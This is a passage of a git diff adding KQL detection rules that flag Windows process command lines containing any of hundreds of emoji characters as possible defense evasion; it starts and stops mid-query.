"🧑🏿‍🚒" or ProcessCommandLine contains "👨🏿‍🚒" or ProcessCommandLine contains "👩🏿‍✈️" or ProcessCommandLine contains "🧑🏿‍✈️" or ProcessCommandLine contains "👨🏿‍✈️" or ProcessCommandLine contains "👩🏿‍🚀" or ProcessCommandLine contains "🧑🏿‍🚀" or ProcessCommandLine contains "👨🏿‍🚀" or ProcessCommandLine contains "👩🏿‍⚖️" or ProcessCommandLine contains "🧑🏿‍⚖️" or ProcessCommandLine contains "👨🏿‍⚖️" or ProcessCommandLine contains "👰🏿‍♀️" or ProcessCommandLine contains "👰🏿" or ProcessCommandLine contains "👰🏿‍♂️" or ProcessCommandLine contains "🤵🏿‍♀️" or ProcessCommandLine contains "🤵🏿" or ProcessCommandLine contains "🤵🏿‍♂️" or ProcessCommandLine contains "👸🏿" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🤴🏿" or ProcessCommandLine contains "🥷🏿" or ProcessCommandLine contains "🦸🏿‍♀️" or ProcessCommandLine contains "🦸🏿" or ProcessCommandLine contains "🦸🏿‍♂️" or ProcessCommandLine contains "🦹🏿‍♀️" or ProcessCommandLine contains "🦹🏿" or ProcessCommandLine contains "🦹🏿‍♂️" or ProcessCommandLine contains "🤶🏿" or ProcessCommandLine contains "🧑🏿‍🎄" or ProcessCommandLine contains "🎅🏿" or ProcessCommandLine contains "🧙🏿‍♀️" or ProcessCommandLine contains "🧙🏿" or ProcessCommandLine contains "🧙🏿‍♂️" or ProcessCommandLine contains "🧝🏿‍♀️" or ProcessCommandLine contains "🧝🏿" or ProcessCommandLine contains "🧝🏿‍♂️" or ProcessCommandLine contains "🧛🏿‍♀️" or ProcessCommandLine contains "🧛🏿" or ProcessCommandLine contains "🧛🏿‍♂️" or ProcessCommandLine contains "🧜🏿‍♀️" or ProcessCommandLine contains "🧜🏿" or ProcessCommandLine contains "🧜🏿‍♂️" or ProcessCommandLine contains "🧚🏿‍♀️" or ProcessCommandLine contains "🧚🏿" or ProcessCommandLine contains "🧚🏿‍♂️" or ProcessCommandLine contains "👼🏿" or ProcessCommandLine contains "🤰🏿" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🤱🏿" or ProcessCommandLine contains "👩🏿‍🍼" or ProcessCommandLine contains "🧑🏿‍🍼" or ProcessCommandLine contains "👨🏿‍🍼" or ProcessCommandLine contains "🙇🏿‍♀️" or ProcessCommandLine contains "🙇🏿" or ProcessCommandLine contains "🙇🏿‍♂️" or ProcessCommandLine contains "💁🏿‍♀️" or ProcessCommandLine contains "💁🏿" or ProcessCommandLine contains "💁🏿‍♂️" or ProcessCommandLine contains "🙅🏿‍♀️" or ProcessCommandLine contains "🙅🏿" or ProcessCommandLine contains "🙅🏿‍♂️" or ProcessCommandLine contains "🙆🏿‍♀️" or ProcessCommandLine contains "🙆🏿" or ProcessCommandLine contains "🙆🏿‍♂️" or ProcessCommandLine contains "🙋🏿‍♀️" or ProcessCommandLine contains "🙋🏿" or ProcessCommandLine contains "🙋🏿‍♂️" or ProcessCommandLine contains "🧏🏿‍♀️" or ProcessCommandLine contains "🧏🏿" or ProcessCommandLine contains "🧏🏿‍♂️" or ProcessCommandLine contains "🤦🏿‍♀️" or ProcessCommandLine contains "🤦🏿" or ProcessCommandLine contains "🤦🏿‍♂️" or ProcessCommandLine contains "🤷🏿‍♀️" or ProcessCommandLine contains "🤷🏿" or ProcessCommandLine contains "🤷🏿‍♂️" or ProcessCommandLine contains "🙎🏿‍♀️" or ProcessCommandLine contains "🙎🏿" or ProcessCommandLine contains "🙎🏿‍♂️" or ProcessCommandLine contains "🙍🏿‍♀️" or ProcessCommandLine contains "🙍🏿" or ProcessCommandLine contains "🙍🏿‍♂️" or ProcessCommandLine contains "💇🏿‍♀️" or ProcessCommandLine contains "💇🏿" or ProcessCommandLine contains "💇🏿‍♂️" or ProcessCommandLine contains "💆🏿‍♀️" or ProcessCommandLine contains "💆🏿" or ProcessCommandLine contains "💆🏿‍♂️" or ProcessCommandLine contains "🧖🏿‍♀️" or ProcessCommandLine contains "🧖🏿" or ProcessCommandLine contains "🧖🏿‍♂️" or ProcessCommandLine contains "💃🏿" or ProcessCommandLine contains "🕺🏿" or ProcessCommandLine contains "🕴🏿" or ProcessCommandLine contains "👩🏿‍🦽" or ProcessCommandLine contains "🧑🏿‍🦽" or ProcessCommandLine contains "👨🏿‍🦽" or ProcessCommandLine contains "👩🏿‍🦼" or ProcessCommandLine contains "🧑🏿‍🦼" or ProcessCommandLine contains "👨🏿‍🦼" or ProcessCommandLine contains "🚶🏿‍♀️" or ProcessCommandLine contains "🚶🏿" or ProcessCommandLine contains "🚶🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦯" or ProcessCommandLine contains "🧑🏿‍🦯" or ProcessCommandLine contains "👨🏿‍🦯" or ProcessCommandLine contains "🧎🏿‍♀️" or ProcessCommandLine contains "🧎🏿" or ProcessCommandLine contains "🧎🏿‍♂️" or ProcessCommandLine contains "🏃🏿‍♀️" or ProcessCommandLine contains "🏃🏿" or ProcessCommandLine contains "🏃🏿‍♂️" or ProcessCommandLine contains "🧍🏿‍♀️" or ProcessCommandLine contains "🧍🏿" or ProcessCommandLine contains "🧍🏿‍♂️" or ProcessCommandLine contains "👭🏿" or ProcessCommandLine contains "🧑🏿‍🤝‍🧑🏿" or ProcessCommandLine contains "👬🏿" or ProcessCommandLine contains "👫🏿" or ProcessCommandLine contains "🧗🏿‍♀️" or ProcessCommandLine contains "🧗🏿" or ProcessCommandLine contains "🧗🏿‍♂️" or ProcessCommandLine contains "🏇🏿" or ProcessCommandLine contains "🏂🏿" or ProcessCommandLine contains "🏌🏿‍♀️" or ProcessCommandLine contains "🏌🏿" or ProcessCommandLine contains "🏌🏿‍♂️" or ProcessCommandLine contains "🏄🏿‍♀️" or ProcessCommandLine contains "🏄🏿" or ProcessCommandLine contains "🏄🏿‍♂️" or ProcessCommandLine contains "🚣🏿‍♀️" or ProcessCommandLine contains "🚣🏿" or ProcessCommandLine contains "🚣🏿‍♂️" or ProcessCommandLine contains "🏊🏿‍♀️" or ProcessCommandLine contains "🏊🏿" or ProcessCommandLine contains "🏊🏿‍♂️" or ProcessCommandLine contains "⛹🏿‍♀️" or ProcessCommandLine contains "⛹🏿" or ProcessCommandLine contains "⛹🏿‍♂️" or ProcessCommandLine contains "🏋🏿‍♀️" or ProcessCommandLine contains "🏋🏿" or ProcessCommandLine contains "🏋🏿‍♂️" or ProcessCommandLine contains "🚴🏿‍♀️" or ProcessCommandLine contains "🚴🏿" or ProcessCommandLine contains "🚴🏿‍♂️" or ProcessCommandLine contains "🚵🏿‍♀️" or ProcessCommandLine contains "🚵🏿" or ProcessCommandLine contains "🚵🏿‍♂️" or ProcessCommandLine contains "🤸🏿‍♀️" or ProcessCommandLine contains "🤸🏿" or ProcessCommandLine contains "🤸🏿‍♂️" or ProcessCommandLine contains "🤽🏿‍♀️" or ProcessCommandLine contains "🤽🏿" or ProcessCommandLine contains "🤽🏿‍♂️" or ProcessCommandLine contains "🤾🏿‍♀️" or ProcessCommandLine contains "🤾🏿" or ProcessCommandLine contains "🤾🏿‍♂️" or ProcessCommandLine contains "🤹🏿‍♀️" or ProcessCommandLine contains "🤹🏿" or ProcessCommandLine contains "🤹🏿‍♂️" or ProcessCommandLine contains "🧘🏿‍♀️" or ProcessCommandLine contains "🧘🏿" or ProcessCommandLine contains "🧘🏿‍♂️" or ProcessCommandLine contains "🛀🏿" or ProcessCommandLine contains "🛌🏿" or ProcessCommandLine contains "🐶" or ProcessCommandLine contains "🐱" or ProcessCommandLine contains "🐭" or ProcessCommandLine contains "🐹" or ProcessCommandLine contains "🐰" or ProcessCommandLine contains "🦊" or ProcessCommandLine contains "🐻" or ProcessCommandLine contains "🐼" or ProcessCommandLine contains "🐻‍❄️" or ProcessCommandLine contains "🐨" or ProcessCommandLine contains "🐯" or ProcessCommandLine contains "🦁" or ProcessCommandLine contains "🐮" or ProcessCommandLine contains "🐷" or ProcessCommandLine contains "🐽" or ProcessCommandLine contains "🐸" or ProcessCommandLine contains "🐵" or ProcessCommandLine contains "🙈" or ProcessCommandLine contains "🙉" or ProcessCommandLine contains "🙊" or ProcessCommandLine contains "🐒" or ProcessCommandLine contains "🐔" or ProcessCommandLine contains "🐧" or ProcessCommandLine contains "🐦" or ProcessCommandLine contains "🐤" or ProcessCommandLine contains "🐣" or ProcessCommandLine contains "🐥"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
new file mode 100644
index 00000000..4c0221ee
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "🦆" or ProcessCommandLine contains "🦅" or ProcessCommandLine contains "🦉" or ProcessCommandLine contains "🦇" or ProcessCommandLine contains "🐺" or ProcessCommandLine contains "🐗" or ProcessCommandLine contains "🐴" or ProcessCommandLine contains "🦄" or ProcessCommandLine contains "🐝" or ProcessCommandLine contains "🪱" or ProcessCommandLine contains "🐛" or ProcessCommandLine contains "🦋" or ProcessCommandLine contains "🐌" or ProcessCommandLine contains "🐞" or ProcessCommandLine contains "🐜" or ProcessCommandLine contains "🪰" or ProcessCommandLine contains "🪲" or ProcessCommandLine contains "🪳" or ProcessCommandLine contains "🦟" or ProcessCommandLine contains "🦗" or ProcessCommandLine contains "🕷" or ProcessCommandLine contains "🕸" or ProcessCommandLine contains "🦂" or ProcessCommandLine contains "🐢" or ProcessCommandLine contains "🐍" or ProcessCommandLine contains "🦎" or ProcessCommandLine contains "🦖" or ProcessCommandLine contains "🦕" or ProcessCommandLine contains "🐙" or ProcessCommandLine contains "🦑" or ProcessCommandLine contains "🦐" or ProcessCommandLine contains "🦞" or ProcessCommandLine contains "🦀" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🐡" or ProcessCommandLine contains "🐠" or ProcessCommandLine contains "🐟" or ProcessCommandLine contains "🐬" or ProcessCommandLine contains "🐳" or ProcessCommandLine contains "🐋" or ProcessCommandLine contains "🦈" or ProcessCommandLine contains "🐊" or ProcessCommandLine contains "🐅" or ProcessCommandLine contains "🐆" or ProcessCommandLine contains "🦓" or ProcessCommandLine contains "🦍" or ProcessCommandLine contains "🦧" or ProcessCommandLine contains "🦣" or ProcessCommandLine contains "🐘" or ProcessCommandLine contains "🦛" or ProcessCommandLine contains "🦏" or ProcessCommandLine contains "🐪" or ProcessCommandLine contains "🐫" or ProcessCommandLine contains "🦒" or ProcessCommandLine contains "🦘" or ProcessCommandLine contains "🦬" or ProcessCommandLine contains "🐃" or ProcessCommandLine contains "🐂" or ProcessCommandLine contains "🐄" or ProcessCommandLine contains "🐎" or ProcessCommandLine contains "🐖" or ProcessCommandLine contains "🐏" or ProcessCommandLine contains "🐑" or ProcessCommandLine contains "🦙" or ProcessCommandLine contains "🐐" or ProcessCommandLine contains "🦌" or ProcessCommandLine contains "🐕" or ProcessCommandLine contains "🐩" or ProcessCommandLine contains "🦮" or ProcessCommandLine contains "🐕‍🦺" or ProcessCommandLine contains "🐈" or ProcessCommandLine contains "🐈‍⬛" or ProcessCommandLine contains "🪶" or ProcessCommandLine contains "🐓" or ProcessCommandLine contains "🦃" or ProcessCommandLine contains "🦤" or ProcessCommandLine contains "🦚" or ProcessCommandLine contains "🦜" or ProcessCommandLine contains "🦢" or ProcessCommandLine contains "🦩" or ProcessCommandLine contains "🕊" or ProcessCommandLine contains "🐇" or ProcessCommandLine contains "🦝" or ProcessCommandLine contains "🦨" or ProcessCommandLine contains "🦡" or ProcessCommandLine contains "🦫" or ProcessCommandLine contains "🦦" or ProcessCommandLine contains "🦥" or ProcessCommandLine contains "🐁" or ProcessCommandLine contains "🐀" or ProcessCommandLine contains "🐿" or ProcessCommandLine contains "🦔" or ProcessCommandLine contains "🐾" or ProcessCommandLine contains "🐉" or ProcessCommandLine contains "🐲" or ProcessCommandLine contains "🌵" or ProcessCommandLine contains "🎄" or ProcessCommandLine contains "🌲" or ProcessCommandLine contains "🌳" or ProcessCommandLine contains "🌴" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🪵" or ProcessCommandLine contains "🌱" or ProcessCommandLine contains "🌿" or ProcessCommandLine contains "☘️" or ProcessCommandLine contains "🍀" or ProcessCommandLine contains "🎍" or ProcessCommandLine contains "🪴" or ProcessCommandLine contains "🎋" or ProcessCommandLine contains "🍃" or ProcessCommandLine contains "🍂" or ProcessCommandLine contains "🍁" or ProcessCommandLine contains "🍄" or ProcessCommandLine contains "🐚" or ProcessCommandLine contains "🪨" or ProcessCommandLine contains "🌾" or ProcessCommandLine contains "💐" or ProcessCommandLine contains "🌷" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🌹" or ProcessCommandLine contains "🥀" or ProcessCommandLine contains "🌺" or ProcessCommandLine contains "🌸" or ProcessCommandLine contains "🌼" or ProcessCommandLine contains "🌻" or ProcessCommandLine contains "🌞" or ProcessCommandLine contains "🌝" or ProcessCommandLine contains "🌛" or ProcessCommandLine contains "🌜" or ProcessCommandLine contains "🌚" or ProcessCommandLine contains "🌕" or ProcessCommandLine contains "🌖" or ProcessCommandLine contains "🌗" or ProcessCommandLine contains "🌘" or ProcessCommandLine contains "🌑" or ProcessCommandLine contains "🌒" or ProcessCommandLine contains "🌓" or ProcessCommandLine contains "🌔" or ProcessCommandLine contains "🌙" or ProcessCommandLine contains "🌎" or ProcessCommandLine contains "🌍" or ProcessCommandLine contains "🌏" or ProcessCommandLine contains "🪐" or ProcessCommandLine contains "💫" or ProcessCommandLine contains "⭐️" or ProcessCommandLine contains "🌟" or ProcessCommandLine contains "✨" or ProcessCommandLine contains "⚡️" or ProcessCommandLine contains "☄️" or ProcessCommandLine contains "💥" or ProcessCommandLine contains "🔥" or ProcessCommandLine contains "🌪" or ProcessCommandLine contains "🌈" or ProcessCommandLine contains "☀️" or ProcessCommandLine contains "🌤" or ProcessCommandLine contains "⛅️" or ProcessCommandLine contains "🌥" or ProcessCommandLine contains "☁️" or ProcessCommandLine contains "🌦" or ProcessCommandLine contains "🌧" or ProcessCommandLine contains "⛈" or ProcessCommandLine contains "🌩" or ProcessCommandLine contains "🌨" or ProcessCommandLine contains "❄️" or ProcessCommandLine contains "☃️" or ProcessCommandLine contains "⛄️" or ProcessCommandLine contains "🌬" or ProcessCommandLine contains "💨" or ProcessCommandLine contains "💧" or ProcessCommandLine contains "💦" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "☔️" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🌊" or ProcessCommandLine contains "🌫🍏" or ProcessCommandLine contains "🍎" or ProcessCommandLine contains "🍐" or ProcessCommandLine contains "🍊" or ProcessCommandLine contains "🍋" or ProcessCommandLine contains "🍌" or ProcessCommandLine contains "🍉" or ProcessCommandLine contains "🍇" or ProcessCommandLine contains "🍓" or ProcessCommandLine contains "🫐" or ProcessCommandLine contains "🍈" or ProcessCommandLine contains "🍒" or ProcessCommandLine contains "🍑" or ProcessCommandLine contains "🥭" or ProcessCommandLine contains "🍍" or ProcessCommandLine contains "🥥" or ProcessCommandLine contains "🥝" or ProcessCommandLine contains "🍅" or ProcessCommandLine contains "🍆" or ProcessCommandLine contains "🥑" or ProcessCommandLine contains "🥦" or ProcessCommandLine contains "🥬" or ProcessCommandLine contains "🥒" or ProcessCommandLine contains "🌶" or ProcessCommandLine contains "🫑" or ProcessCommandLine contains "🌽" or ProcessCommandLine contains "🥕" or ProcessCommandLine contains "🫒" or ProcessCommandLine contains "🧄" or ProcessCommandLine contains "🧅" or ProcessCommandLine contains "🥔" or ProcessCommandLine contains "🍠" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🥐" or ProcessCommandLine contains "🥯" or ProcessCommandLine contains "🍞" or ProcessCommandLine contains "🥖" or ProcessCommandLine contains "🥨" or ProcessCommandLine contains "🧀" or ProcessCommandLine contains "🥚" or ProcessCommandLine contains "🍳" or ProcessCommandLine contains "🧈" or ProcessCommandLine contains "🥞" or ProcessCommandLine contains "🧇" or ProcessCommandLine contains "🥓" or ProcessCommandLine contains "🥩" or ProcessCommandLine contains "🍗" or ProcessCommandLine contains "🍖" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "🌭" or ProcessCommandLine contains "🍔" or ProcessCommandLine contains "🍟" or ProcessCommandLine contains "🍕" or ProcessCommandLine contains "🫓" or ProcessCommandLine contains "🥪" or ProcessCommandLine contains "🥙" or ProcessCommandLine contains "🧆" or ProcessCommandLine contains "🌮" or ProcessCommandLine contains "🌯" or ProcessCommandLine contains "🫔" or ProcessCommandLine contains "🥗" or ProcessCommandLine contains "🥘" or ProcessCommandLine contains "🫕" or ProcessCommandLine contains "🥫" or ProcessCommandLine contains "🍝" or ProcessCommandLine contains "🍜" or ProcessCommandLine contains "🍲" or ProcessCommandLine contains "🍛" or ProcessCommandLine contains "🍣" or ProcessCommandLine contains "🍱" or ProcessCommandLine contains "🥟" or ProcessCommandLine contains "🦪" or ProcessCommandLine contains "🍤" or ProcessCommandLine contains "🍙" or ProcessCommandLine contains "🍚" or ProcessCommandLine contains "🍘" or ProcessCommandLine contains "🍥" or ProcessCommandLine contains "🥠" or ProcessCommandLine contains "🥮" or ProcessCommandLine contains "🍢" or ProcessCommandLine contains "🍡" or ProcessCommandLine contains "🍧" or ProcessCommandLine contains "🍨" or ProcessCommandLine contains "🍦" or ProcessCommandLine contains "🥧" or ProcessCommandLine contains "🧁" or ProcessCommandLine contains "🍰" or ProcessCommandLine contains "🎂" or ProcessCommandLine contains "🍮" or ProcessCommandLine contains "🍭" or ProcessCommandLine contains "🍬" or ProcessCommandLine contains "🍫" or ProcessCommandLine contains "🍿" or ProcessCommandLine contains "🍩" or ProcessCommandLine contains "🍪" or ProcessCommandLine contains "🌰" or ProcessCommandLine contains "🥜" or ProcessCommandLine contains "🍯" or ProcessCommandLine contains "🥛" or ProcessCommandLine contains "🍼" or ProcessCommandLine contains "🫖" or ProcessCommandLine contains "☕️" or ProcessCommandLine contains "🍵" or ProcessCommandLine contains "🧃" or ProcessCommandLine contains "🥤" or ProcessCommandLine contains "🧋" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🍶" or ProcessCommandLine contains "🍺" or ProcessCommandLine contains "🍻" or ProcessCommandLine contains "🥂" or ProcessCommandLine contains "🍷" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🥃" or ProcessCommandLine contains "🍸" or ProcessCommandLine contains "🍹" or ProcessCommandLine contains "🧉" or ProcessCommandLine contains "🍾" or ProcessCommandLine contains "🧊" or ProcessCommandLine contains "🥄" or ProcessCommandLine contains "🍴" or ProcessCommandLine contains "🍽" or ProcessCommandLine contains "🥣" or ProcessCommandLine contains "🥡" or ProcessCommandLine contains "🥢" or ProcessCommandLine contains "🧂" or ProcessCommandLine contains "⚽️" or ProcessCommandLine contains "🏀" or ProcessCommandLine contains "🏈" or ProcessCommandLine contains "⚾️" or ProcessCommandLine contains "🥎" or ProcessCommandLine contains "🎾" or ProcessCommandLine contains "🏐" or ProcessCommandLine contains "🏉" or ProcessCommandLine contains "🥏" or ProcessCommandLine contains "🎱" or ProcessCommandLine contains "🪀" or ProcessCommandLine contains "🏓" or ProcessCommandLine contains "🏸" or ProcessCommandLine contains "🏒" or ProcessCommandLine contains "🏑" or ProcessCommandLine contains "🥍" or ProcessCommandLine contains "🏏" or ProcessCommandLine contains "🪃" or ProcessCommandLine contains "🥅" or ProcessCommandLine contains "⛳️" or ProcessCommandLine contains "🪁" or ProcessCommandLine contains "🏹" or ProcessCommandLine contains "🎣" or ProcessCommandLine contains "🤿" or ProcessCommandLine contains "🥊" or ProcessCommandLine contains "🥋" or ProcessCommandLine contains "🎽" or ProcessCommandLine contains "🛹" or ProcessCommandLine contains "🛼" or ProcessCommandLine contains "🛷" or ProcessCommandLine contains "⛸" or ProcessCommandLine contains "🥌" or ProcessCommandLine contains "🎿" or ProcessCommandLine contains "⛷" or ProcessCommandLine contains "🏂" or ProcessCommandLine contains "🪂" or ProcessCommandLine contains "🏋️‍♀️" or ProcessCommandLine contains "🏋️" or ProcessCommandLine contains "🏋️‍♂️" or ProcessCommandLine contains "🤼‍♀️" or ProcessCommandLine contains "🤼" or ProcessCommandLine contains "🤼‍♂️" or ProcessCommandLine contains "🤸‍♀️" or ProcessCommandLine contains "🤸" or ProcessCommandLine contains "🤸‍♂️" or ProcessCommandLine contains "⛹️‍♀️" or ProcessCommandLine contains "⛹️" or ProcessCommandLine contains "⛹️‍♂️" or ProcessCommandLine contains "🤺" or ProcessCommandLine contains "🤾‍♀️" or ProcessCommandLine contains "🤾" or ProcessCommandLine contains "🤾‍♂️" or ProcessCommandLine contains "🏌️‍♀️" or ProcessCommandLine contains "🏌️" or ProcessCommandLine contains "🏌️‍♂️" or ProcessCommandLine contains "🏇" or ProcessCommandLine contains "🧘‍♀️" or ProcessCommandLine contains "🧘" or ProcessCommandLine contains "🧘‍♂️" or ProcessCommandLine contains "🏄‍♀️" or ProcessCommandLine contains "🏄" or ProcessCommandLine contains "🏄‍♂️" or ProcessCommandLine contains "🏊‍♀️" or ProcessCommandLine contains "🏊" or ProcessCommandLine contains "🏊‍♂️" or ProcessCommandLine contains "🤽‍♀️" or ProcessCommandLine contains "🤽" or ProcessCommandLine contains "🤽‍♂️" or ProcessCommandLine contains "🚣‍♀️" or ProcessCommandLine contains "🚣" or ProcessCommandLine contains "🚣‍♂️" or ProcessCommandLine contains "🧗‍♀️" or ProcessCommandLine contains "🧗" or ProcessCommandLine contains "🧗‍♂️" or ProcessCommandLine contains "🚵‍♀️" or ProcessCommandLine contains "🚵" or ProcessCommandLine contains "🚵‍♂️" or ProcessCommandLine contains "🚴‍♀️" or ProcessCommandLine contains "🚴" or ProcessCommandLine contains "🚴‍♂️" or ProcessCommandLine contains "🏆" or ProcessCommandLine contains "🥇" or ProcessCommandLine contains "🥈" or ProcessCommandLine contains "🥉" or ProcessCommandLine contains "🏅" or ProcessCommandLine contains "🎖" or ProcessCommandLine contains "🏵" or ProcessCommandLine contains "🎗" or ProcessCommandLine contains "🎫" or ProcessCommandLine contains "🎟" or ProcessCommandLine contains "🎪" or ProcessCommandLine contains "🤹" or ProcessCommandLine contains "🤹‍♂️" or ProcessCommandLine contains "🤹‍♀️" or ProcessCommandLine contains "🎭" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "🎨" or ProcessCommandLine contains "🎬" or ProcessCommandLine contains "🎤" or ProcessCommandLine contains "🎧" or ProcessCommandLine contains "🎼" or ProcessCommandLine contains "🎹" or ProcessCommandLine contains "🥁" or ProcessCommandLine contains "🪘" or ProcessCommandLine contains "🎷" or ProcessCommandLine contains "🎺" or ProcessCommandLine contains "🪗" or ProcessCommandLine contains "🎸" or ProcessCommandLine contains "🪕" or ProcessCommandLine contains "🎻" or ProcessCommandLine contains "🎲" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "🎯" or ProcessCommandLine contains "🎳" or ProcessCommandLine contains "🎮" or ProcessCommandLine contains "🎰" or ProcessCommandLine contains "🧩" or ProcessCommandLine contains "🚗" or ProcessCommandLine contains "🚕" or ProcessCommandLine contains "🚙" or ProcessCommandLine contains "🚌" or ProcessCommandLine contains "🚎" or ProcessCommandLine contains "🏎" or ProcessCommandLine contains "🚓" or ProcessCommandLine contains "🚑" or ProcessCommandLine contains "🚒" or ProcessCommandLine contains "🚐" or ProcessCommandLine contains "🛻" or ProcessCommandLine contains "🚚" or ProcessCommandLine contains "🚛" or ProcessCommandLine contains "🚜" or ProcessCommandLine contains "🦯" or ProcessCommandLine contains "🦽" or ProcessCommandLine contains "🦼" or ProcessCommandLine contains "🛴" or ProcessCommandLine contains "🚲" or ProcessCommandLine contains "🛵" or ProcessCommandLine contains "🏍" or ProcessCommandLine contains "🛺" or ProcessCommandLine contains "🚨" or ProcessCommandLine contains "🚔" or ProcessCommandLine contains "🚍" or ProcessCommandLine contains "🚘" or ProcessCommandLine contains "🚖" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🚡" or ProcessCommandLine contains "🚠" or ProcessCommandLine contains "🚟" or ProcessCommandLine contains "🚃" or ProcessCommandLine contains "🚋" or ProcessCommandLine contains "🚞" or ProcessCommandLine contains "🚝" or ProcessCommandLine contains "🚄" or ProcessCommandLine contains "🚅" or ProcessCommandLine contains "🚈" or ProcessCommandLine contains "🚂" or ProcessCommandLine contains "🚆" or ProcessCommandLine contains "🚇" or ProcessCommandLine contains "🚊" or ProcessCommandLine contains "🚉" or ProcessCommandLine contains "✈️" or ProcessCommandLine contains "🛫" or ProcessCommandLine contains "🛬" or ProcessCommandLine contains "🛩" or ProcessCommandLine contains "💺" or ProcessCommandLine contains "🛰" or ProcessCommandLine contains "🚀" or ProcessCommandLine contains "🛸" or ProcessCommandLine contains "🚁" or ProcessCommandLine contains "🛶" or ProcessCommandLine contains "⛵️" or ProcessCommandLine contains "🚤" or ProcessCommandLine contains "🛥" or ProcessCommandLine contains "🛳" or ProcessCommandLine contains "⛴" or ProcessCommandLine contains "🚢" or ProcessCommandLine contains "⚓️" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪝" or ProcessCommandLine contains "⛽️" or ProcessCommandLine contains "🚧" or ProcessCommandLine contains "🚦" or ProcessCommandLine contains "🚥" or ProcessCommandLine contains "🚏" or ProcessCommandLine contains "🗺" or ProcessCommandLine contains "🗿" or ProcessCommandLine contains "🗽" or ProcessCommandLine contains "🗼" or ProcessCommandLine contains "🏰" or ProcessCommandLine contains "🏯" or ProcessCommandLine contains "🏟" or ProcessCommandLine contains "🎡" or ProcessCommandLine contains "🎢" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🎠" or ProcessCommandLine contains "⛲️" or ProcessCommandLine contains "⛱" or ProcessCommandLine contains "🏖" or ProcessCommandLine contains "🏝" or ProcessCommandLine contains "🏜" or ProcessCommandLine contains "🌋" or ProcessCommandLine contains "⛰" or ProcessCommandLine contains "🏔" or ProcessCommandLine contains "🗻" or ProcessCommandLine contains "🏕" or ProcessCommandLine contains "⛺️" or ProcessCommandLine contains "🛖" or ProcessCommandLine contains "🏠" or ProcessCommandLine contains "🏡" or ProcessCommandLine contains "🏘" or ProcessCommandLine contains "🏚" or ProcessCommandLine contains "🏗" or ProcessCommandLine contains "🏭" or ProcessCommandLine contains "🏢" or ProcessCommandLine contains "🏬" or ProcessCommandLine contains "🏣" or ProcessCommandLine contains "🏤" or ProcessCommandLine contains "🏥" or ProcessCommandLine contains "🏦" or ProcessCommandLine contains "🏨" or ProcessCommandLine contains "🏪" or ProcessCommandLine contains "🏫" or ProcessCommandLine contains "🏩" or ProcessCommandLine contains "💒" or ProcessCommandLine contains "🏛" or ProcessCommandLine contains "⛪️" or ProcessCommandLine contains "🕌" or ProcessCommandLine contains "🕍" or ProcessCommandLine contains "🛕" or ProcessCommandLine contains "🕋" or ProcessCommandLine contains "⛩" or ProcessCommandLine contains "🛤" or ProcessCommandLine contains "🛣" or ProcessCommandLine contains "🗾" or ProcessCommandLine contains "🎑" or ProcessCommandLine contains "🏞" or ProcessCommandLine contains "🌅" or ProcessCommandLine contains "🌄" or ProcessCommandLine contains "🌠" or ProcessCommandLine contains "🎇" or ProcessCommandLine contains "🎆" or ProcessCommandLine contains "🌇" or ProcessCommandLine contains "🌆" or ProcessCommandLine contains "🏙" or ProcessCommandLine contains "🌃" or ProcessCommandLine contains "🌌" or ProcessCommandLine contains "🌉" or ProcessCommandLine contains "🌁" or ProcessCommandLine contains "⌚️" or ProcessCommandLine contains "📱" or ProcessCommandLine contains "📲" or ProcessCommandLine contains "💻" or ProcessCommandLine contains "⌨️" or ProcessCommandLine contains "🖥" or ProcessCommandLine contains "🖨" or ProcessCommandLine contains "🖱" or ProcessCommandLine contains "🖲" or ProcessCommandLine contains "🕹" or ProcessCommandLine contains "🗜" or ProcessCommandLine contains "💽" or ProcessCommandLine contains "💾" or ProcessCommandLine contains "💿" or ProcessCommandLine contains "📀" or ProcessCommandLine contains "📼" or ProcessCommandLine contains "📷" or ProcessCommandLine contains "📸" or ProcessCommandLine contains "📹" or ProcessCommandLine contains "🎥" or ProcessCommandLine contains "📽" or ProcessCommandLine contains "🎞" or ProcessCommandLine contains "📞" or ProcessCommandLine contains "☎️" or ProcessCommandLine contains "📟" or ProcessCommandLine contains "📠" or ProcessCommandLine contains "📺" or ProcessCommandLine contains "📻" or ProcessCommandLine contains "🎙" or ProcessCommandLine contains "🎚" or ProcessCommandLine contains "🎛" or ProcessCommandLine contains "🧭" or ProcessCommandLine contains "⏱" or ProcessCommandLine contains "⏲" or ProcessCommandLine contains "⏰" or ProcessCommandLine contains "🕰" or ProcessCommandLine contains "⌛️" or ProcessCommandLine contains "⏳" or ProcessCommandLine contains "📡" or ProcessCommandLine contains "🔋" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🔌" or ProcessCommandLine contains "💡" or ProcessCommandLine contains "🔦" or ProcessCommandLine contains "🕯" or ProcessCommandLine contains "🪔" or ProcessCommandLine contains "🧯" or ProcessCommandLine contains "🛢" or ProcessCommandLine contains "💸" or ProcessCommandLine contains "💵" or 